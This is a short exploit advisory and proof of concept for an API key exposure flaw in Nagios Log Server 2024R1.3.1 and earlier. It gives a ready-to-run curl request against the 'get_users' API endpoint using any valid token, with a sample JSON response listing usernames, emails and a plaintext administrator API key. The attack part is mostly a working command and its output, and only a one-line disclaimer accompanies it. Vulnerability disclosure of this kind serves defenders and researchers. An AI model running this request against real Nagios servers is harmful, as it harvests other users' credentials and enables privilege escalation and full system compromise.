# Exploit Title: Nagios Log Server 2024R1.3.1 - API Key Exposure
# Date: 2025-04-08
# Exploit Author: Seth Kraft, Alex Tisdale
# Vendor Homepage: https://www.nagios.com/
# Vendor Changelog: https://www.nagios.com/changelog/#log-server
# Software Link: https://www.nagios.com/products/log-server/download/
# Version: Nagios Log Server 2024R1.3.1 and below
# Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04)
# CWE: CWE-200, CWE-284, CWE-522
# CVSS: 9.8 (CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
# Type: Information Disclosure, Improper Access Control
# Exploit Risk: Critical

## Disclosure
For ethical research purposes only. Do not target systems without proper authorization.

## Description
An API-level vulnerability in Nagios Log Server 2024R1.3.1 allows any user with a valid API token to retrieve a full list of user accounts along with their plaintext API keys, including administrator credentials. This flaw enables user enumeration, privilege escalation, and full system compromise via unauthorized use of exposed tokens.

## PoC

### Step 1: Access the vulnerable endpoint

```
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"
```

## Sample Response

```json
[
  {
    "name": "devadmin",
    "username": "devadmin",
    "email": "test@example.com",
    "apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
    "auth_type": "admin",
    ...
  }
]
```